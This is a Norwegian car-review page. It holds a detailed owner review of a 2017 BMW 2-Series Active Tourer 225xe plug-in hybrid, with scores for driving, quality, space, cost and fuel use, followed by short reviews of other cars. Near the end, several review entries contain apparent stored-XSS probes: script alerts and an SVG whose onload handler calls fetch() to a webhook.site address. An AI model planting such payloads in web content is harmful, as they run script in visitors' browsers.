Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2017 BMW 2-Serie Active Tourer 225xe Active Tourer iPerformance eDrive aut Kombikupé Bensin/Batteri

Vurdert av Tor225xe

Score 9.4/10

Denne bilen må kunne kalles et Kinderegg - 3 gode ting på engang :-)<br /> - Norsk avgiftssystem gjør at en får ca 200.000,- i rabatt i forhold til å kjøpe en vanlig bensin utgave <br /> - Ladehybrid som gjør at en kan kjøre miljøvennlig - i praksis kan kjøre 30km på strøm<br /> - Super BMW kvalitet og kjøreegenskaper, med 4x4 inkludert i prisen<br /> Bilen anbefales varmt!

Kjøreglede

9 / 10
Kjøregleden er ikke på nivå med 3-serie og 5-serie, men til å være en flerbruksbil er kjøregleden svært høy. Kjøregleden er et godt hakk over folke SUV klassen.
Sørg for å kjøpe sports-seter og gjerne navi Pro med head-up display samt adaptiv cruise. Dette er utstyr som absolutt hever kjøregleden. M-sport pakke gjør også at utseendet står litt mer i stil med kjøregleden.
Drivlinjen er svært god med 224hk i systemeffekt og 385Nm i systemoment, 4x4, silkemyke girskift samt umerkbar inn/utkobling av bensinmotoren. Velger en Sportsmodus går 0-100 unna på 6,7s :-).
Det er 2 ting som gjør at jeg ikke gir den 10 i karakter, og det er en bred A-stolpe med ekstra vindu, samt at det innvendige speilet er plassert for lavt ned. Begge deler forstyrrer/reduserer sikten for føreren.

Kvalitet/driftssikkerhet

10 / 10
Kvalitetsfølelsen er på velkjent høyt BMW nivå. Seter, brytere, ratt, navi, osv er standard BMW komponenter med en svært god kvalitetsfølelse. Byggekvaliteten virker også å være på velkjent BMW nivå.
Bilen har så langt gått drøyt 10000 km uten noen feil. Vi har hatt en rekke andre nye biler tidligere, og det normale er dessverre at de fleste får irriterende feil selv etter kort tid. Så langt er altså BMWén feilfri :-)

Plass/praktiske løsninger

9 / 10
I forhold til de kompakte utvendige målene er plassen i bilen god. Plassen for fører er svært god - det er faktisk plass for førere i 2 meters klassen. Baksetet har normalt god plass - noe bedre enn i en 3-serie, ganske likt som i en Mazda CX-5 og noe dårligere enn f.eks. en RAV4 eller en Outlander. Bagasjerommet har et greit volum og en god utforming. Til tross for at de har pakket inn elektromotorer og batterier er gulvet helt flatt med et kjekt oppbevaringsrom under hvor en får plass til ladekabel, skjøtekabel osv. Anbefaler å krysse av for rails i ekstrautstyrslisten slik at en kan montere skiboks de få gangene en har behov for mer plass.
Fordi bilen er ca 10cm høyere enn en vanlig sedan/ stasjonsvogn er inn-/utstigning svært enkelt. Bakkeklaringen er på 16,7 cm noe som gjør at grus-/hytteveier og noe snø ikke er et problem. Bakkeklaringen er faktisk på nivå med flere folke SUVér - Honda CRV har 16,5cm.
Bilen har godt med oppbevaringsplass i dører, greie oppbevaringsrom, komfortabelt midtarmlene, gode koppholdere bak osv.
Bilen kan kobles til en BMW Connected app hvor en bl.a kan styre forvarming eller forkjøling (på sommeren). Dette er hverdagsluksus som fort blir en vane og noe en ikke vil være foruten.
En sak som trekker litt ned er at koppholderne i midtkonsollen foran er svært små - både i diameter og dybde. De er f.eks. en del mindre enn de en finner i nye BMW X1.

Økonomi/kostnader

10 / 10
Her blir det en klar 10ér. En må ut med 4-500.000,- for en ny bil, avhengig av hvor mye utstyr en velger. Dette uansett lite i forhold til hva en må ut med om en velger en annen bil med tilsvarende egenskaper. Serviceutgiftene er lave og servicen hos BMW forhandlerne er svært god. Sannsynligvis vil verditapet være lavere enn for biler som ikke er ladehybrider og har 4x4.

Drivstoff/forbruk

9 / 10
Bilen kan kjøres ca 30 km på strøm og det holder til det aller meste av kjøringen i hverdagen. På langtur bruker den drøyt 0,5l/mil (avhengig av fartsgrense). Så langt har bilen vår hatt et gjennomsnittsforbruk på 0,34 l/mil, men det forutsetter at en lader ofte.

Flere vurderinger fra samme generasjon

BMW 2-Serie Active Tourer (2023)

Dette er en god bil som er god å kjøre, rimlig i drift og har god fremkommelighet med drift på alle 4 hjul. Godt utstyrt og skjermer som er plassert der en ønsker. Rekkevidde EL opptil 90km i somm

Score 9.8

Vurdert av NoEl

BMW 2-Serie Active Tourer (2021)

Min tredje BMW.Fortsatt storfornøyd med kvalitet og komfort.

Score 9.4

Vurdert av Ludde

BMW 2-Serie Active Tourer (2019)

2019 modell, hvor vi kjøpte demobil. På mage måter en god bil. Men kan ikke fatte løsningene på sidestolpene. Irriterer meg fortsatt over at jeg ikke registrerte irritasjonsmoment før kjøp.

Score 6.4

Vurdert av Kimi

BMW 2-Serie Active Tourer (2019)

Score 9.2

Vurdert av Force

BMW 2-Serie Active Tourer (2018)

Bilen har innfridd alle mine ønsker. Har leaset den, men vurderer å kjøpe den når leasingen går ut. det eneste negative er liten bensintank og litt stumpete på dårlig vei.

Score 9.4

Vurdert av DagO

BMW 2-Serie Active Tourer (2018)

Spennende konsept, men akk for lite batteri, tørst bensin motor og for trang innstigning! Døråpningen er for lav og for kort!

Score 6.6

Vurdert av Sorlending

BMW 2-Serie Active Tourer (2018)

Min første BMW og synes nok bilen er noe oppskrytt. Går nok tilbake til mitt forrige merke når tiden kommer.

Score 7.4

Vurdert av jorgfri

BMW 2-Serie Active Tourer (2017)

Mye bil for pengene, med god kvalitet.

Score 8.2

Vurdert av Gubben

BMW 2-Serie Active Tourer (2017)

Tysk industriavfall i premiuminnpakning, for å lure folk som meg som trodde bmw var solid kvalitet.

Score 3.6

Vurdert av Petecomplete

BMW 2-Serie Active Tourer (2017)

Veldig godt fornøyd.

Score 9.2

Vurdert av Mortis

BMW 2-Serie Active Tourer (2017)

Veldig praktisk og gøy bil som bruker veldig lite drivstoff dersom du lader regelmessig. Utrolig rask.

Score 9.2

Vurdert av Lynvingen

BMW 2-Serie Active Tourer (2017)

Meget godt fornøyd

Score 9.6

Vurdert av Stein

BMW 2-Serie Active Tourer (2017)

en veldig god vinter bil med mulighet for forvarming og veldig effektiv setevarme og fantastisk med rettvarme, samt mulighet for 4x4 når du trenger det. 10 poeng for bil for pengen.

Score 9.4

Vurdert av alopo

BMW 2-Serie Active Tourer (2017)

En både fornuftig, praktisk og sportslig BMW til en meget god pris. Kan kjøres meget rimelig, men her avhenger kjøremønsteret

Score 9.6

Vurdert av Roqen

BMW 2-Serie Active Tourer (2017)

Meget godt fornøyd. Kjører 3,5 mil hver dag så hverdagskjøringen går kun på strøm. Vanvittig drag i bilen når begge motorene jobber sammen. Morsomt! Har 2 barn og kone. Nok plass

Score 9.4

Vurdert av Lars

Flere vurderinger

Citroën DS3 (2012)

Billog liten sportsbil. Jeg vil tro at dette må være en veldig gøy førstebil for mange. Den går godt om mann får bensin 156hk utgaven den ser bra ut og den ligger godt på veien.

Score 6.8

Vurdert av Kimmi500

Volvo XC40 (2024)

Veldig fornøyd med bil, komfort og spesielt støy som er lavere enn de fleste biler i denne klasse/ pris. Ingen problemer med bilen!

Score 9.6

Vurdert av HGB68

Skoda Enyaq (2025)

Brukt som drosje, har per nå 75000km. Veldig stor oppgradering å få batterivarme. Regenerativ bremsing anbefales ikke på vinterføre. Får minus på forbruk da bilen gir meg 270-330km på kaldeste

Score 6.6

Vurdert av uKultuR

Volvo EX30 (2025)

Mekanisk fin bil men med et makkverk av software som er full av feil. Se Volvo ex30 forum for tidenes lengste og gjentakende feil rapporter. Volvo ser ikke ut til å være interessert å ordne opp des

Score 2.4

Vurdert av Slurp

Skoda Enyaq (2023)

Syns utseende å bilen er tøff, ellers kan jeg ikke sa hva den skal være bedre på enn sine konkurrenter. Sitte stillingen passer meg dårlig, men fruen liker det. Pluss at den har soltak Elendi

Score 6.8

Vurdert av Dincer

Mazda CX-5 (2013)

Bilens største utfordring med skyactive motor er relatert til partikkelfilter, koksing av inntaksmanifold og tett sumpfilter, som kan lede til havari. Annet er utkobling av turbo på grunn av feil ve

Score 7.0

Vurdert av Olav

Renault 5 E-Tech (2025)

Dette er virkelig en bil jeg anbefaler. Årets bil i Europa og Årets bil i Norge, med god grunn. Veldig kult retro-design. Legger til at Renault også hadde årets bil i Europa i 2024 med Scenic E-Te

Score 8.4

Vurdert av Knut

Citroën e-C4 (2025)

Jeg er foreløpig veldig fornøyd. Har slitt litt med å finne den optimale sittekomforten, men en pute gjorde susen der (jeg er 180 og trengte ekstra korsryggstøtte). Bilens automatikk passer meg ve

Score 9.0

Vurdert av Siri

Aston Martin DB9 GT (2017)

alert("total")

Score 5.0

Vurdert av test

Aston Martin DB9 GT (2017)

totalvurderingtest

Score 5.0

Vurdert av test

Abarth 500e (2024)

Score 10

Vurdert av Bernt

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996